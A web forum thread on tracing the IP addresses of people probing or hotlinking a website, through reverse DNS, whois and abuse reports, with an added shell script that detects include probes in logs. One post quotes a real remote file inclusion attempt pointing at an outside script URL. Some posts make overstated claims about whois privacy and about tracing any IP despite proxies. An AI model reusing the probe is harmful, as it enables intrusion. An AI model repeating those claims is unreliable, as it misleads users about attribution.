Checking the logs and noticed a few people are trying to hack/hotlink my site. I've got their IP details, could I then find which web site they came from?
If the IP is unique to the hacker, not a shared IP, you might see if a web site comes up when you type http://ip. I have no idea about a shared IP. Shannon
Most likely they aren't running these things from the same IP their site (if they have one) is hosted on. Your chances of finding something are pretty slim, but yes, you could try just http://ip
I tried entering http://ip but no luck. I think the IP is from a web site since it links to more than one file.
When you're talking about an IP, are you talking about the IP in a referrer field? If not, then why are you saying it's a website? If you want to find out an administrative contact for the IP address of someone you think is trying to hack in, go to www.samspade.org and put the IP in the first box and click "Do Stuff". It'll do a whois on the IP address, which will give you contact information for the owners of the IPs. -Nev
Try http://www.whois.sc/IPADDRESS. You have to register to see all hosted websites though, in case more than 1 domain is hosted on that IP.
Much easier than all of the above on a normal professional Linux desktop - all in shell (bash).

Here is a near-real-time, real-world example from a hacker attempt a few hours back:

0. Log lines - you send all - below is only one for you:

85.214.42.97 - - [11/Nov/2007:03:50:02 +0800] "GET /english//include/config.inc.php?root=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 403 1012 "-" "libwww-perl/5.803"

1. > host 85.214.42.97
97.42.214.85.in-addr.arpa domain name pointer geest-verlag.de.

>> gives you a domain name / web site, if any is associated. Then you have the option - again in bash:

2. Now you may want to know WHO the above site owner is - in bash:
> whois geest-verlag.de
may give you full name, address, email, etc. OR NOT, if people want to hide. Never mind - in case of hacker or abuse you always go directly to the HIGHEST level, that is:

3. whois 85.214.42.97
A whois on the IP gives you the NETWORK owner, i.e. an ISP or a datacenter!! Their entry normally is LONG and meets all common legal requirements, no hiding anymore - HIDING of whois data is for CRIMINALS and people who eventually may plan to do such or similar illegal things. Honest site owners always have a full and public WHOIS record!

You usually always find an abuse email address to report hacker attacks or copyright infringement abuse originating FROM ANY of their IPs - no matter whether a domain name is associated or it is a dynamic IP. If NO abuse@ ... is listed but only the network domain name, still send your email to abuse@ that web site of the network owner - abuse addresses are required and networks have one even if NOT listed. In addition, on the above whois "IP" you normally get hostmaster@ and a few other email addresses with short comments. Send your email to all listed addresses to assure it is processed the fastest way, hence an email

TO: abuse@ xyz hostmaster@ xyz webmaster@ xyz

Always include facts and solid legal FULL evidence of hot linking and copyright infringement. Make it a professional email with ALL data and all facts that allow an instant and final reaction by the network owner! In case of hacker attempts, include all related log lines from your access_log or error_log or /var/log/messages, depending on the kind of hacker attack.

Remember that ALL is logged, and if at a certain time a dynamic IP was used for 60 seconds - accessed via cable or however - that origin or the 60 seconds access is logged and can normally always be tracked to the apartment and computer being used - even if the hacker uses a proxy!! With a proxy it simply needs one more step - but the procedure to track is the same.

Hence to track down an IP to its data center is a matter of seconds - to send the abuse complaint another few minutes. In case of hacker abuse just forward the log lines your server SENT YOU with 2-3 lines - no extra comments needed - the log lines say it all - see above case.

Example for the above real scenario situation this morning:

active hacker from your network IP 85.214.42.97
attached loglines from a hacker visit on my server a few hours ago
log times are GMT +8

The first line should/might be a clear subject line for an email to abuse@ so the person on duty instantly sees the priority of your mail - hacker stuff may be done in seconds because hackers may do substantial damage to OTHERS as well - copyright infringement may take a few hours longer.

NEVER waste your time emailing the actual site owner. Most site owners have NO idea about their own site NOR about security NOR about how to solve it - a hostmaster shuts their site down in minutes, or at least shuts down the path from within which the abuse took place, while site owners love to argue and lose / waste your precious time. In addition many site OWNERS lack the required email addresses such as info@, webmaster@ and abuse@, hence you email to a site and hours later you may get all emails bouncing back and nothing at all has been done.
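The log-to-report steps in the post above, as an added shell example that is not part of the original thread: it picks the include-probe lines out of an access log, derives the in-addr.arpa name that `host` looks up, and drafts the report with the subject line first. The sample log is constructed (documentation-range IPs, example.* hosts) and the function names are hypothetical.

```shell
#!/bin/sh
# Added example, not from the thread. SAMPLE_LOG is constructed:
# documentation-range IPs and example.* hosts, combined log format.
SAMPLE_LOG='203.0.113.7 - - [11/Nov/2007:03:50:02 +0800] "GET /english//include/config.inc.php?root=http://files.example.net/id.txt? HTTP/1.1" 403 1012 "-" "libwww-perl/5.803"
198.51.100.23 - - [11/Nov/2007:03:51:10 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Nov/2007:03:50:05 +0800] "GET /english//index.php?page=http://files.example.net/id.txt? HTTP/1.1" 404 980 "-" "libwww-perl/5.803"
192.0.2.44 - - [11/Nov/2007:04:02:41 +0800] "GET /images/logo.png HTTP/1.1" 200 20480 "http://blog.example.org/post" "Mozilla/5.0"'

# Keep log lines (stdin) whose query string passes a URL as a parameter
# value, the shape of the include probe quoted in the post.
probe_lines() {
  grep -E '"(GET|POST|HEAD) [^" ]*\?[^" ]*=(https?|ftp)://' || true
}

# Probe requests per client IP, busiest first: "<count> <ip>".
probe_ips() {
  probe_lines | awk '{n[$1]++} END {for (ip in n) print n[ip], ip}' | sort -rn
}

# Name that `host <ip>` queries for; fails on anything but a dotted quad.
ptr_name() {
  printf '%s\n' "$1" | awk -F. '
    NF != 4 { exit 1 }
    { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1
      print $4 "." $3 "." $2 "." $1 ".in-addr.arpa" }'
}

# Draft the report for one IP from the log on stdin: subject line first,
# then the log timezone, then only that IP's probe lines as evidence.
abuse_report() {
  ip=$1
  lines=$(probe_lines | awk -v ip="$ip" '$1 == ip')
  [ -n "$lines" ] || return 1
  tz=$(printf '%s\n' "$lines" | awk 'NR == 1 { sub(/\]/, "", $5); print $5 }')
  printf 'Subject: active hacker from your network IP %s\n\n' "$ip"
  printf 'Log times are GMT %s. Reverse lookup name: %s\n\n' "$tz" "$(ptr_name "$ip")"
  printf '%s\n' "$lines"
}

printf '%s\n' "$SAMPLE_LOG" | probe_ips
printf '%s\n' "$SAMPLE_LOG" | abuse_report 203.0.113.7
```

PTR records are set by whoever controls the address block, so the name a reverse lookup returns describes the network side and need not match any site served from that IP.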
I lol'd at "how" is he. This should help: http://www.geekpedia.com/tutorial144_Log-visitors-with-PHP-and-MySQL.html A simpler way might be to install a counter or tracking script like Google Analytics.
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 127.0.0.1. Since these numbers are usually assigned to internet service providers within region-based blocks, an IP address can often be used to identify the region or country from which a computer is connecting to the Internet. An IP address can sometimes be used to show the user's general location.